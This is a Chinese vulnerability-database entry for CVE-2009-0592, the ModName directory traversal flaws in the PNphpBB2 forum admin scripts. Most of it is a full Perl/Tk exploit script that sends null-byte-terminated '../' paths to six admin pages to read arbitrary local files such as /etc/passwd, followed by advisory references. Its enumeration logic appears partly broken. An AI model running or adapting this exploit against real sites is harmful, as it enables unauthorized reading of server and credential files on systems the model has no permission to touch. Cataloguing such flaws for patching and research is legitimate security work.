PNphpBB2 参数ModName 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117192 漏洞类型 路径遍历
发布时间 2009-01-04 更新时间 2009-02-17
CVE编号 CVE-2009-0592 CNNVD-ID CNNVD-200902-354
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7658
https://cxsecurity.com/issue/WLB-2009020192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-354
|漏洞详情
PNphpBB21.2i版本及其早期版本中存在多个目录遍历漏洞。远程攻击者可以借助对(1)admin_words.php,(2)admin_groups_reapir.php,(3)admin_smilies.php,(4)admin_ranks.php,(5)admin_styles.php,和(6)admin/中的admin_users.php的ModName参数中的一个..,包含和运行任意本地文件。
|漏洞EXP
#!/usr/bin/perl
# PNphpBB2 <= 1.2i (ModName) Multiple LFI Exploit
# by athos - staker[at]hotmail[dot]it

use strict;
use LWP::Simple;
use Tk;

my ($host,$file,$about);

my $poc = "PNphpBB2 <= 1.2i (ModName) Multiple LFI Exploit";
my $obj = new MainWindow(-background => '#E4E4E4');

$obj->title($poc);
$obj->minsize(500,200);
$obj->maxsize(500,200);

text('Host/Path (ex: http://localhost/cms)');
input1();
text('Local File (ex: ../../../../../etc/passwd');
input2();
button();
Button();

print $host;

sub text {
   
   my $load = undef;
   my $text = shift;
   
   $load = $obj->Label(
                  -text  => $text,
                  -font  => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                )->pack(-anchor => 'n');
   return $load;           
}


sub input1 {
   
   return $obj->Entry(
                  -textvariable => \$host,
                  -font         => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                  )->pack(-anchor => 'n');
   
}


sub input2 {
   
   return $obj->Entry(
                  -textvariable => \$file,
                  -font         => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                  )->pack(-anchor => 'n');
   
}

sub button {

   return $obj->Button(
                -text    => 'Exploit',
                -font    => 'monospace 8',
                -foreground   => '#000000',
                -background   => '#E4E4E4',
                -command => sub { exploit(); }
               )->pack(-anchor => 'n');
}

sub Button {
   
   return $obj->Button(
                -text    => 'Credits',
                -font    => 'monospace 8',
                -foreground   => '#000000',
                -background   => '#E4E4E4',
                -command => sub { about(); }
               )->pack(-anchor => 'n');
}

sub exploit {
   
   my $enum = 0;
   my @path = (
             '/admin/admin_words.php?ModName=',
             '/admin/admin_groups_reapir.php?ModName=',
             '/admin/admin_smilies.php?ModName=',
             '/admin/admin_ranks.php?ModName=',
             '/admin/admin_styles.php?ModName=',
             '/admin/admin_users.php?ModName=',
           );  
   
   if(get($path[$enum]) =~ /no such file/i) {
      $enum++;
   }
   else {
      window(get($host.$path[$enum].$file.'%00'));
   }            
}


sub window {
   
   my $A = shift;
   my $T = new MainWindow(-background => '#E4E4E4');
   
   $T->title('Exploit Content');
   
   return $T->Label(
              -text       => $A,
              -font       => 'monospace 8',
              -background => '#E4E4E4',
              -foreground => '#000000',
            )->pack(-anchor => 'n');  
}            

sub about {
   
   $about .= $poc;
   $about .= "\nby athos - staker[at]hotmail[dot]it\r";
   $about .= "\ndownload on http://www.pnphpbb.com\r";
   $about .= "\nregister globals  = 1\r";
   $about .= "\nmagic quotes gpc = 0\r\n";
   
   my $H = new MainWindow(-background => '#E4E4E4');
   
   $H->title('About');
   $H->minsize(500,200);
   $H->maxsize(500,200);
   
   return $H->Label(
              -text       => $about,
              -font       => 'monospace 8',
              -background => '#E4E4E4',
              -foreground => '#000000',
            )->pack(-anchor => 'n');
}



MainLoop;

# milw0rm.com [2009-01-04]
|参考资料

来源:BID
名称:33103
链接:http://www.securityfocus.com/bid/33103
来源:MILW0RM
名称:7658
链接:http://www.milw0rm.com/exploits/7658
来源:SECUNIA
名称:33365
链接:http://secunia.com/advisories/33365